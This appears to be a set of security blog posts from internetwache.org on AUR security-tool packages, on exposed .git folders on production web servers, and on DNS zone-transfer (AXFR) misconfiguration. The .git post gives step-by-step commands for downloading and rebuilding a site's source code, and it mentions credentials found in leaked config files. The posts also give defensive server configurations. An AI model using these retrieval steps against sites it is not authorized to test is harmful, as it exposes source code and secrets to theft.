optional arguments:
  -h, --help            show this help message and exit
  -i [INPUTFILE], --inputfile [INPUTFILE]
                        Inputfile to read domains from. Default: stdin
  -o [OUTPUTFILE], --outputfile [OUTPUTFILE]
                        Outputfile to write zonedata to. Default: stdout
  -l [LOGFILE], --logfile [LOGFILE]
                        Logfile to use. Default: stderr
  -p [PROCESSES], --processes [PROCESSES]
                        Processes to use. Default: 20
  -d [DOMAIN], --domain [DOMAIN]
                        Domain to check. Ignored if -i is used.

Heartbleed scanner

Heartbleed is a pretty scary vulnerability which was discovered in 2014 and since then has been used to extract private keys from various OpenSSL applications. Sebastian built a package called heartbleedscanner-git for the python tools offered by einaros. This package includes three different programs:

• heartbleedscanner : OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner and data miner.
• heartbleedscanner-keyscan: Traverse memory dump, looking for prime factors.
• heartbleedscanner-keydump: Restore SSL priv key based on prime at specific dump file offset.

Poodle scanner

Poodle is the name of a vulnerability in the SSLv3 protocol. There’s now a package for the python poodle scanning tool from 0xICF called poodlescanner-git. Usage:

1
2

$> poodlescanner -H localhost
localhost:443 SSLv3 [Errno 111] Connection refused

Useragent

The package is named useragent-git and it’s a small bash script (source on GitHub) which can be used to print different useragents to stdout. This is often useful in combination with curl or wget.

1
2

$> useragent -w
Mozilla/5.0 (Windows NT 5.0; rv:10.0) Gecko/20100101 Firefox/10.0

Wordlist

You can install wordlist-git which is a package for the python wordlist generation script by rexos. Different patterns can be provided.

1
2
3
4
5
6

> wordlist 0-9 -m 2 -M 3
00
01
02
[...]
999

theHarvester

The package theharvester-git contains a python script which can be used “for gathering e-mail accounts, subdomain names, virtualhosts, open ports/ banners, and employee names from different public sources(search engines, pgp key servers).”. More information can be found on the project’s repository.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Usage: theharvester options 

       -d: Domain to search or company name
       -b: data source: google, googleCSE, bing, bingapi, pgp, linkedin,
                        google-profiles, jigsaw, twitter, googleplus, all

       -s: Start in result number X (default: 0)
       -v: Verify host name via dns resolution and search for virtual hosts
       -f: Save the results into an HTML and XML file
       -n: Perform a DNS reverse query on all ranges discovered
       -c: Perform a DNS brute force for the domain name
       -t: Perform a DNS TLD expansion discovery
       -e: Use this DNS server
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
       -h: use SHODAN database to query discovered hosts
            google 100 to 100, and pgp doesn't use this option)

This was just the small list of packages which Sebastian contributed. There are of course other security related packages in the AUR:

• burpsuite: Free version of burp
• wpscan: Wordpress vulnerability scanner
• sqlmap: SQL injection helper
• subbrute: DNS subdomain brute forcer
• sslyze: SSL testing tool
• ffdec: Flash decompiler
• metasploit: Metasploit framework
• radare2: Portable reversing framework
• and many more

Sebastian will keep contributing useful security packges to the AUR ;)

The team of internetwache.org

With that idea in mind, we began to develop some tiny tools and started to do some research. The results were not as bad as anticipated, but nevertheless surprising.

TL; DR

Some websites host their version control repository (e.g. .git/) in production. Bad people can use tools to download/restore the repository to gain access to your website’s sourcecode. Check your webserver’s configuration now and make sure that it blocks access to these folders.

What is a version control system?

Decades ago programmers were facing a serious problem - (remotely) developing a tool together. In order to change this, version control systems (VCS) were created. The primary task of these is to make distributed work on one codebase possible. This can be achieved by keeping track of each code change (often called commit). One well-known VCS is called git and is maintained by the infamous Linus Torvalds. You probably also heard of the online code hosting platform github.com, which offers to host your git repository.

During our research, we focused on the git-VCS:

• Git

There are plenty of other VCS which we’re not covering here, but the same issue may apply too

• SVN (Apache Subversion) - Another scan netted us about 900 vulnerable sites
• HG (Mercurial)
• Bazaar
• CVS (Concurrent Versions System)
• BitKeeper

Why is hosting your VCS in production bad?

When deploying a web application, some administrators simply clone the repository. Most version control systems create a meta/tracking folder in the root directory of the project. For example:

• git creates a .git/ folder containig a full copy of the repository.
• Others may follow a similar approach (e.g. SVN)

You probably may get the idea what bad boys can do if you do not deny access to the client side repositories. Not only does it most certainly contain your website’s sourcecode and all previous revisions, but sometimes also configuration files with sensitive information. This gives attackers a kick-start for hacking your website, because they can use the sourceode to find more severe security issues.

Downloading the website’s sourcecode

So let’s get to the interesting part - How do we download and restore the aforementioned respositories to get access to the website’s sourcecode? Basically there are two ways to do it:

• Easy way, if webserver has directory listing enabled
• Hard way, otherwise

As mentioned before, most version control systems manage the repository in a lot of small files (objects). The filenames are often the result of a hash function, so guessing them is hard. We need to find a way to obtain as many of those files as possible.

The easy way

First of all, it’s considered bad practice to have directory listing enabled on your production server. If you have, stop reading and fix that first :) - but that’s not enough to stop the attacker. (see “The hard way”)

Directory-listing helps the attacker a lot, because all he has to do is to issue one command to download all files.

It’s enough to run the following wget command:

1

wget --mirror -I .git TARGET.COM/.git/ 

After the download has finished, switch into the new folder. A fancy shell (e.g. fish or zsh) should tell you that you’re in a git-tracked directory (see the ‘master’-branch hint).

1
2
3
4
5

/tmp/test/ttrss.me (0) (master)
> /usr/bin/ls -a
. 
..  
.git

Running git status shows only deleted files, because we only have downloaded the .git folder.

1
2
3
4
5
6
7
8
9
10
11
12

/tmp/test/ttrss.me (0) (master)                                                                                                                                        
> git status | head -n 10 
On branch master
Your branch is up-to-date with 'origin/master'.
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git checkout -- <file>..." to discard changes in working directory)

        deleted:       .buildpath
        deleted:       .gitignore
        deleted:       .htaccess
        deleted:       .project

After running git checkout -- . to reset the repository, we recovered all files.

1
2
3
4
5
6
7
8
9
10
11

/tmp/test/ttrss.me (0) (master) 
> /usr/bin/ls | head -n 10
apiatom-to-html.xsl
backend.php
cache
classes
config.php-dist
css
errors.php
feed-icons
image.php

We have sucessfully obtained a copy of the website’s sourcecode.

The hard way

As mentioned before, our intentation was to see if there’s a way to download the repository without directory listing. For this, you have to dig a bit into the git-internals to understand how git is managing the repository.

We won’t go into too much detail here - we recommend the appropiate chapters on git-scm.com/book for interested readers -, but basically there are three kind of objects in a git repository:

• Blob - The actual data (e.g. sourcecode)
• Tree - Grouping blobs together
• Commit - A specific state of a tree with more meta information (e.g. author/date/message)

All these together are used by git under the hood to maintain the repository. However, the problem that we face is, that these objects are stored as .git/objects/[First-2-bytes]/[Last-38-bytes] files, where [First-2-bytes][Last-38-bytes] is the SHA1-hash of the object. We need to be smart and guess/extract the filenames of all objects to completely restore the repository, because brute forcing the SHA1 keyspace isn’t a good idea as it would be too time consuming.

What helps us a lot is the fact that there are some standard files in a git repository:

• HEAD
• objects/info/packs
• description
• config
• COMMIT_EDITMSG
• index
• packed-refs
• refs/heads/master
• refs/remotes/origin/HEAD
• refs/stash
• logs/HEAD
• logs/refs/heads/master
• logs/refs/remotes/origin/HEAD
• info/refs
• info/exclude

These files either refer an object by its hash or another file referencing an object and so on. Thus the easiest way is to start with downloading and parsing the aforementioned files. We need to parse these to continue to download the object files.

So for example, we have downloaded the refs/heads/master file:

1
2

> cat .git/refs/heads/master 
6916ae52c0b20b04569c262275d27422fc4fcd34

The reference master points to a commit with the hash 6916ae52c0b20b04569c262275d27422fc4fcd34. After downloading the commit-object from the server (note the url should be .git/objects/69/16ae52c0b20b04569c262275d27422fc4fcd34), we can analyse it further:

1
2

> git cat-file -t 6916ae52c0b20b04569c262275d27422fc4fcd34 
commit

This tells us, that the downloaded object is indeed a commit. Let’s get some details about it:

1
2
3
4
5
6
7

> git cat-file -p 6916ae52c0b20b04569c262275d27422fc4fcd34 
tree fa3887a0b798346c122afdd7c5ecc605bf3c18c0
parent 9264d57c621f66208d689ef653ce8a62c3bccfae
author XY <foo@bar> 1429391394 +0200
committer XY <foo@bar> 1429391394 +0200

Added another readme file

Okay, now we know the hash of the related tree and parent object as well as some information about the author, the committer and the commit message.

We download the tree-object and analyse it:

1
2
3
4
5

> git cat-file -p fa3887a0b798346c122afdd7c5ecc605bf3c18c0
040000 tree 532fc6055e09e0a2d5602f4b84c0dbadce1b5f3e        Dumper
040000 tree 077ce769dedcf19d0f063246256e8ae0394fd8df        Extractor
040000 tree d6e1bd4677a256e760cce5ddaa7db7ea6f9a8900        Finder
100644 blob 9670cf17dfeec351c395493058044b9f9dadbe2a        README.md

This tells us which files are stored in that tree. Note that Dumper, Extractor and Finder are also trees (directories). The final step is to download the README.md blob object and cat its content:

1
2
3
4

> git cat-file -p 9670cf17dfeec351c395493058044b9f9dadbe2a
Git Tools
=============
[...]

We need to take special care of packed files. We can find a list of all packs in .git/objects/info/packs

1
2

> cat .git/objects/info/packs 
P pack-e38660e6be24bb79d8d929ddea3d194e0dd3cd13.pack

The appropiate pack file is stored in .git/objects/pack/:

1
2
3

> /usr/bin/ls .git/objects/pack/
pack-e38660e6be24bb79d8d929ddea3d194e0dd3cd13.idx
pack-e38660e6be24bb79d8d929ddea3d194e0dd3cd13.pack

In that case, we need to download both files and then run the following command to extract the packed data:

1
2

> git unpack-objects -r < .git/objects/pack/pack-e38660e6be24bb79d8d929ddea3d194e0dd3cd13.pack
Unpacking objects: 100% (15/15), done.

As you can see, by doing this procedure recursively and for every possible hash, which we find in the already downloaded files, we can slowly restore the repository and extract the contents.

Sometimes downloading a specific object will fail, leaving us with an incomplete repository. In that case, we can use git fsck command to search for these missing/broken object files.

Tools

We’ve released our python/bash scripts used for this research on github: https://github.com/internetwache/GitTools

We used three different tools: A tool to discover, one to download and one to extract git repositories.

Preview of the recovery tool:

Scanning Alexa’s Top 1M

After running the ‘Finder’ on the Alexa Top 1M list, we found about 9700 public accessible Git repositories - that means that only <1% is prone to to this kind of attack.

Taking a look at the research data, we discovered the following mayor-effected business sectors and websites:

• Big websites of german und US political parties / NGOs and a few governmental websites (.gov)
• MTV-channels and radio stations (>20)
• Online communities (one of it with >6 million users)
• Trading websites (one with bitcoin and many other “banking websites”)
• A very famous privacy online service
• Soccer clubs of the german “Bundesliga”
• Porn websites
• Bigger and smaller online shops

It seemed like an accessible git repository was intended on some websites - mostly open source projects where the website’s sourcecode is available online.

The more the Alexa rank descended, the higher was the probability of finding a website which was affected by this issue.

Here is an overview of the most prominent top level domains.

It’s interesting to see the distribution of protocols used. Especially that unencrypted protocols like http or git are used.

A lot of vulnerable websites use either GitHub or BitBucket as the remote.

Most common branch names. It’s interesting to see some dev / develop branches here.

On the other side, we had to hold our breath when we noticed that more than 100 projects used HTTP-Authentication for server-client communication. That means, that the protocol://user:password@host/repository combination is saved in the .git/config file, giving attackers access to the users (companies) GitLab-instance or GitHub/BitBucket account. With a bit of luck an attacker gets access to the CI-Server and then runs malicious code to further compromise your infrastructure.

Other than that, we’ve found a lot of AWS/Database/SMTP/FTP credentials in some repositories.

How to fix this issue?

First: GIT is a great tool - if you use it right. So not using GIT is no option, you should rather look at the access rights of your webserver - we have prepared a list to fix the issue.

It’s really easy to deny access to .git folders:

Apache

For 2.4:

1
2
3

<DirectoryMatch "^/.*/\.git/">
    Require all denied
</DirectoryMatch>

For 2.2:

1
2
3
4

<DirectoryMatch "^/.*/\.git/">
    Order deny,allow
    Deny from all
</DirectoryMatch>

Put that into your httpd.conf.

Nginx

1
2
3

location ~ /.git/ {
      deny all;
}

Put that as the first entry in your server-block in the nginx.conf file.

Lighttpd

First, you need to enable the mod_access module:

1

server.modules += ( "mod_access" )

After that, we can block access to the .git folder:

1
2
3

$HTTP["url"] =~ "^/\.git/" {
     url.access-deny = ("")
}

Put that into your lighttpd.conf.

Another approach is to use git’s --git-dir and --work-tree switches to move the git repository out of the document root.

Microsoft IIS

We were contact and given the hint that the following PowerShell commands will add .git to the Request Filtering hiddenSegments:

1
2
3
4

Import-Module IISAdministration
$requestFiltering = Get-IISConfigSection -CommitPath 'Default Web Site' -SectionPath 'system.webServer/security/requestFiltering'
$hiddenSegments = Get-IISConfigCollection -ConfigElement $requestFiltering -CollectionName 'hiddenSegments'
New-IISConfigCollectionElement -ConfigCollection $hiddenSegments -ConfigAttribute @{ 'segment'='.git' }

The resulting web.config should then contain the following:

1
2
3
4
5
6
7
8
9
10
11

<configuration>
    <system.webServer>
        <security>
            <requestFiltering>
                <hiddenSegments>
                    <add segment=".git" />
                </hiddenSegments>
            </requestFiltering>
        </security>
    </system.webServer>
</configuration>

Conclusion

There are a bunch of famous websites which do not deny access to the /.git/ folder - anyone may download their sourcecode and possibly other sensitive data. This issue isn’t hard to mitigate, so take a minute to make sure that your webserver isn’t misconfigured.

Stay safe, the team of internetwache.org

We’ve checked Alexa’s Top 1M for this kind of issue and came to some interesting results.

What is AXFR?

Asynchronous Xfer Full Range is a mechanism used by the DNS system to transfer zone information for a domain from a master (primary) DNS server to several slave (secondary) DNS servers. A slave sends an AXFR-request to the master which replies with all DNS information associated to a domain (zone).

What could possibly go wrong?

If the master server does not validate the source of an AXFR request, anyone will be able to download the DNS zone file from this server. Usually only the secondary servers should be allowed to download the zone information from the master server.

One could argue that all the information in a zone file is publicly available, because you can request it “easily”:

1
2
3
4
5
6

> dig NS google.com
;; ANSWER SECTION:
google.com.                21599        IN        NS        ns3.google.com.
google.com.                21599        IN        NS        ns2.google.com.
google.com.                21599        IN        NS        ns1.google.com.
google.com.                21599        IN        NS        ns4.google.com.

We request information about the nameservers of google.com first. There are four nameservers which are answering DNS-requests for the domain.

1
2
3
4
5
6
7
8
9
10
11
12
13

> dig A google.com @ns4.google.com
;; ANSWER SECTION:
google.com.                300        IN        A        173.194.32.196
google.com.                300        IN        A        173.194.32.201
google.com.                300        IN        A        173.194.32.198
google.com.                300        IN        A        173.194.32.199
google.com.                300        IN        A        173.194.32.194
google.com.                300        IN        A        173.194.32.193
google.com.                300        IN        A        173.194.32.200
google.com.                300        IN        A        173.194.32.206
google.com.                300        IN        A        173.194.32.195
google.com.                300        IN        A        173.194.32.192
google.com.                300        IN        A        173.194.32.197

Now, we asked the fourth nameserver (ns4.google.com) to list us all A (IPv4) entries for the domain google.com.

The same works for other request types (AAA/TXT/MX/CNAME/…), but you will need to know the DNS entry to ask for. It’s not possible to ask something like “List me all subdomains for google.com in your zone”. There are tools like Subbrute which brute-force the entries.

From a security perspective this information is the most valuable, because you are probably going to find some entries pointing to unprotected/vulnerable software.

For example an admin sets up a monitoring system at the subdomain monitoring.internal.server1.domain.tld. He thinks that it is hard for an attacker to guess this subdomain and that he does not need to set up additional layers of security to protect the system from unauthorized access.

If one of his nameservers is misconfigured, an attacker can send an AXFR request, download the zone and get access to the monitoring system.

Scanning Alexa’s top 1M

We wanted to see how many misconfigured nameservers can be found in Alexa’s top 1M websites. We used a small python script to do the work. You can find it on GitHub.

The results were a bit astonishing:

• 132854 AXFRs were made
• 72401 unique domains are affected
• 48448 unique nameservers are affected

Some domains had multiple misconfigured nameservers, thus there have been more transfers than domains affected or the other way round that one nameserver served more than one zonefile.

So on average every 20th website of the top Alexa 1M runs a misconfigured webserver.

TLDs of the affected domains:

TLDs of the affected nameservers:

We were very disappointed to see some well and not so well known hosting companies running misconfigured nameservers. Grabbing some random samples from the data lead to the conclusion that information of the companies or it’s customers could be accessed unauthenticated (similar to the scenario described above).

All other kind of websites could be found in our research results, too: Ranging from (huge) news portals over shopping sites to small personal websites.

How to fix?

The easiest way to fix this issue is to re-check your dns server’s configuration file. Make sure that the nameservers only allow AXFR to subsidiary nameservers and that these aren’t allowed to answer AXFR requests.

If you want to check if your nameservers are misconfigured, you can use the following one-liner directly on your bash shell:

1
2
3
4

#!/bin/bash
# You need to have dnsutils installed
DOMAIN="YOURDOMAIN.TLD"
dig NS $DOMAIN +short | sed -e "s/\.$//g" | while read nameserver; do echo "Testing $DOMAIN @ $nameserver"; dig AXFR $DOMAIN "@$nameserver"; done

If you don’t want to use the shell, you can use the following website: https://hackertarget.com/zone-transfer/

We deeply recommend you to do so :)

If you get the following output for all nameservers then you’re safe.

1

; Transfer failed.

Otherwise you’re probably running a misconfigured server. In case it’s the popular BIND DNS-server you can use the following option to limit the IP addresses:

1

allow-transfer { 192.168.1.1; };

Where 192.168.1.1 is the IP address of the secondary DNS server.

Conclusion

It’s interesting to see that such ‘easy’ configuration mistakes, which had already been discussed around the 90’s, are still happening.

The US CERT picked up on the topic and publised an alert about it.

Stay safe,

the team of internetwache.org

Updates

• #1: 29/03/15: Changed URL for the AXFR testing website. Added configuration option for BIND.
• #2: 08/01/16: Added link to US CERT Alert.